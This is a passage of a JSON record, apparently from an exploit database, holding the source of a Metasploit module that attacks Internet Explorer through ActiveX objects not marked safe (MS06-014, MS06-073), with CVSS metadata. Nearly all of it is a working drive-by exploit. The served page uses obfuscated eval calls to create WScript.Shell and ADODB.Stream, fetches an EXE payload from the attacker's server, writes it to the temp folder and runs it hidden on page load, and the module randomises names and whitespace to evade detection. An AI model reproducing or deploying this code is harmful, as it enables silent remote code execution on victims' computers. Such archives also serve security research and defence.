=>\r\n\t\t\t[\r\n\t\t\t\t\t'{BD96C556-65A3-11D0-983A-00C04FC29E36}',\r\n\t\t\t\t\t'{BD96C556-65A3-11D0-983A-00C04FC29E30}',\r\n\t\t\t\t\t'{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}',\r\n\t\t\t\t\t'{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}',\r\n\t\t\t\t\t'{6414512B-B978-451D-A0D8-FCFDF33E833C}',\r\n\t\t\t\t\t'{06723E09-F4C2-43c8-8358-09FCD1DB0766}',\r\n\t\t\t\t\t'{639F725F-1B2D-4831-A9FD-874847682010}',\r\n\t\t\t\t\t'{BA018599-1DB3-44f9-83B4-461454C84BF8}',\r\n\t\t\t\t\t'{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}',\r\n\t\t\t\t\t'{E8CCCDDF-CA28-496b-B050-6C07C962476B}',\r\n\t\t\t\t\t'{AB9BCEDD-EC7E-47E1-9322-D4A210617116}',\r\n\t\t\t\t\t'{0006F033-0000-0000-C000-000000000046}',\r\n\t\t\t\t\t'{0006F03A-0000-0000-C000-000000000046}',\r\n\t\t\t],\r\n\t\t#:rank => ExcellentRanking # reliable exe writer\r\n\t})\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Internet Explorer COM CreateObject Code Execution',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a generic code execution vulnerability in Internet\r\n\t\t\t\tExplorer by abusing vulnerable ActiveX objects.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'hdm',\r\n\t\t\t\t],\r\n\t\t\t'Version' => '$Revision: 10394 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t# MDAC\r\n\t\t\t\t\t[ 'MSB', 'MS06-014' ],\r\n\t\t\t\t\t[ 'CVE', '2006-0003' ],\r\n\t\t\t\t\t[ 'OSVDB', '24517' ],\r\n\t\t\t\t\t# WMI Object Broker\r\n\t\t\t\t\t[ 'MSB', 'MS06-073' ],\r\n\t\t\t\t\t[ 'CVE', '2006-4704' ],\r\n\t\t\t\t\t[ 'OSVDB', '30155' ],\r\n\t\t\t\t],\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 2048,\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Automatic', { } ],\r\n\r\n\t\t\t\t\t# Patched\r\n\t\t\t\t\t[ 'MS06-014 - RDS.DataSpace', { 'CLSID' => '{BD96C556-65A3-11D0-983A-00C04FC29E36}'} ],\r\n\t\t\t\t\t# Found in mpack\r\n\t\t\t\t\t[ 'MS06-014 - RDS.DataSpace', { 'CLSID' => '{BD96C556-65A3-11D0-983A-00C04FC29E30}'} ],\r\n\r\n\t\t\t\t\t# Patched\r\n\t\t\t\t\t[ 'MS06-073 - WMIScriptUtils.WMIObjectBroker2.1', { 'CLSID' => '{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}'} ],\r\n\r\n\t\t\t\t\t# These are restricted by site (might be exploitable via DNS spoofing + SSL fun)\r\n\t\t\t\t\t[ 'UNKNOWN - SoftwareDistribution.MicrosoftUpdateWebControl.1', { 'CLSID' => '{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}'} ],\r\n\t\t\t\t\t[ 'UNKNOWN - SoftwareDistribution.WebControl.1', { 'CLSID' => '{6414512B-B978-451D-A0D8-FCFDF33E833C}'} ],\r\n\r\n\t\t\t\t\t# Visual Studio components, not marked as safe\r\n\t\t\t\t\t[ 'UNKNOWN - VsmIDE.DTE', { 'CLSID' => '{06723E09-F4C2-43c8-8358-09FCD1DB0766}'} ],\r\n\t\t\t\t\t[ 'UNKNOWN - DExplore.AppObj.8.0', { 'CLSID' => '{639F725F-1B2D-4831-A9FD-874847682010}'} ],\r\n\t\t\t\t\t[ 'UNKNOWN - VisualStudio.DTE.8.0', { 'CLSID' => '{BA018599-1DB3-44f9-83B4-461454C84BF8}'} ],\r\n\t\t\t\t\t[ 'UNKNOWN - Microsoft.DbgClr.DTE.8.0', { 'CLSID' => '{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}'} ],\r\n\t\t\t\t\t[ 'UNKNOWN - VsaIDE.DTE', { 'CLSID' => '{E8CCCDDF-CA28-496b-B050-6C07C962476B}'} ],\r\n\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# The controls below can launch the \"installing component\" dialogs...\r\n\t\t\t\t\t#\r\n\r\n\t\t\t\t\t# Not marked as safe\r\n\t\t\t\t\t[ 'UNKNOWN - Business Object Factory ', { 'CLSID' => '{AB9BCEDD-EC7E-47E1-9322-D4A210617116}'} ],\r\n\r\n\t\t\t\t\t# Not marked as safe\r\n\t\t\t\t\t[ 'UNKNOWN - Outlook Data Object', { 'CLSID' => '{0006F033-0000-0000-C000-000000000046}'} ],\r\n\r\n\t\t\t\t\t# Found exploitable in the wild (no details)\r\n\t\t\t\t\t[ 'UNKNOWN - Outlook.Application', { 'CLSID' => '{0006F03A-0000-0000-C000-000000000046}'} ],\r\n\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget' => 0,\r\n\t\t\t'DisclosureDate' => 'Apr 11 2006'))\r\n\tend\r\n\r\n\tdef on_request_uri(cli, request)\r\n\r\n\t\tif (request.uri.match(/payload/))\r\n\t\t\treturn if ((p = regenerate_payload(cli)) == nil)\r\n\t\t\tdata = generate_payload_exe({ :code => p.encoded })\r\n\t\t\tprint_status(\"Sending EXE payload to #{cli.peerhost}:#{cli.peerport}...\")\r\n\t\t\tsend_response(cli, data, { 'Content-Type' => 'application/octet-stream' })\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\t# Build out the HTML response page\r\n\t\tvar_html = rand_text_alpha(rand(30)+2)\r\n\t\tvar_func_exploit = rand_text_alpha(rand(30)+2);\r\n\t\tvar_func_go = rand_text_alpha(rand(30)+2);\r\n\t\tvar_func_createo = rand_text_alpha(rand(30)+2);\r\n\t\tvar_exe_name = rand_text_alpha(rand(30)+2);\r\n\t\tvar_objects = ''\r\n\r\n\t\t# Build the object list based on target selection\r\n\t\tif (target.name == 'Automatic')\r\n\t\t\ttargets.each do |t|\r\n\t\t\t\tnext if not t['CLSID']\r\n\t\t\t\tvar_objects += t['CLSID'].unpack('C*').map{|c| \" '#{c.chr}' \"}.join(\"+\") + \",\"\r\n\t\t\tend\r\n\t\telse\r\n\t\t\tvar_objects += target['CLSID'].unpack('C*').map{|c| \" '#{c.chr}' \"}.join(\"+\") + \",\"\r\n\t\tend\r\n\r\n\r\n\t\tcontent = %Q^\r\n<html><head><title></title>\r\n<script language=\"javascript\">\r\n\r\nfunction #{var_func_createo}( o , n ) {\r\n\tvar r = null;\r\n\r\n\ttry { eval(\"r=o\" + \".C\" + \"re\" + \"ate\" + \"Ob\" + \"je\" + \"ct(n)\" ) }catch(e){}\r\n\r\n\tif (! r) {\r\n\t\ttry { eval(\"r=o\" + \".Cr\" + \"ea\" + \"teO\" + \"bj\" + \"ect(n,'')\" ) }catch(e){}\r\n\t}\r\n\r\n\tif (! r) {\r\n\t\ttry { eval(\"r=o\" + \".Cr\" + \"ea\" + \"teO\" + \"bj\" + \"ect(n,'','')\" ) }catch(e){}\r\n\t}\r\n\r\n\tif (! r) {\r\n\t\ttry { eval(\"r=o\" + \".Ge\" + \"tOb\" + \"je\" + \"ct('',n)\" ) }catch(e){}\r\n\t}\r\n\r\n\tif (! r) {\r\n\t\ttry { eval(\"r=o\" + \".Ge\" + \"tOb\" + \"ject(n,'')\" ) }catch(e){}\r\n\t}\r\n\r\n\tif (! r) {\r\n\t\ttry { eval(\"r=o\" + \".Ge\" + \"tOb\" + \"ject(n)\" ) }catch(e){}\r\n\t}\r\n\r\n\treturn( r );\r\n}\r\n\r\nfunction #{var_func_go}( a ) {\r\n\r\n\tvar s = #{var_func_createo}( a, \"W\" + \"Sc\" + \"ri\" + \"pt\" + \".S\" + \"he\" + \"ll\" );\r\n\r\n\tvar o = #{var_func_createo}( a, \"A\" + \"DO\" + \"D\" + \"B.S\" + \"tr\" + \"eam\" );\r\n\r\n\tvar e = s.Environment( \"P\" + \"ro\" + \"ce\" + \"ss\" );\r\n\r\n\r\n\tvar url = document.location + '/p' + 'ay' + 'lo' + 'ad';\r\n\tvar xml = null;\r\n\tvar bin = e.Item( \"T\" + \"E\" + \"M\" + \"P\" ) + \"\\\\\\\\#{var_exe_name}\" + \".e\" + \"xe\";\r\n\tvar dat;\r\n\r\n\ttry { xml=new XMLHttpRequest(); }\r\n\tcatch(e) {\r\n\t\ttry { xml = new ActiveXObject(\"Microsoft.XMLHTTP\"); }\r\n\t\tcatch(e) {\r\n\t\t\txml = new ActiveXObject(\"MSXML2.ServerXMLHTTP\");\r\n\t\t}\r\n\t}\r\n\r\n\tif (! xml) {\r\n\t\treturn(0);\r\n\t}\r\n\r\n\txml.open(\"GET\", url, false);\r\n\txml.send(null);\r\n\tdat = xml.responseBody;\r\n\r\n\to.Type = 1 ;\r\n\to.Mode = 3 ;\r\n\to.Open ( ) ;\r\n\to.Write ( dat ) ;\r\n\to.SaveToFile ( bin, 2) ;\r\n\r\n\ts.Run ( bin , 0 );\r\n}\r\n\r\nfunction #{var_func_exploit}( ) {\r\n\tvar i = 0;\r\n\tvar t = new Array( #{var_objects} null );\r\n\r\n\twhile (t[i]) {\r\n\t\tvar a = null;\r\n\r\n\t\tif (t[i].substring(0,1) == '{') {\r\n\t\t\ta = document.createElement(\"object\");\r\n\t\t\ta.setAttribute(\"cl\" + \"as\" + \"sid\", \"cl\" + \"s\" + \"id\" +\":\" + t[i].substring( 1, t[i].length - 1 ) ) ;\r\n\t\t} else {\r\n\t\t\ttry { a = new ActiveXObject(t[i]); } catch(e){}\r\n\t\t}\r\n\r\n\t\tif (a) {\r\n\t\t\ttry {\r\n\t\t\t\tvar b = #{var_func_createo}( a , \"W\" + \"Sc\" + \"ri\" + \"pt\" + \".S\" + \"he\" + \"ll\" ) ;\r\n\t\t\t\tif (b) {\r\n\t\t\t\t\t#{var_func_go}( a ) ;\r\n\t\t\t\t\treturn(0) ;\r\n\t\t\t\t}\r\n\t\t\t} catch(e){\r\n\t\t\t}\r\n\t\t}\r\n\t\ti++;\r\n\t}\r\n}\r\n</script>\r\n</head>\r\n<body onload='#{var_func_exploit}()'>\r\n#{var_html}\r\n</body>\r\n</html>\r\n\r\n^\r\n\r\n\r\n\t\tcontent = Rex::Text.randomize_space(content)\r\n\r\n\t\tprint_status(\"Sending #{self.name} exploit HTML to #{cli.peerhost}:#{cli.peerport}...\")\r\n\r\n\t\t# Transmit the response to the client\r\n\t\tsend_response_html(cli, content)\r\n\r\n\t\t# Handle the payload\r\n\t\thandler(cli)\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/16561/"}]}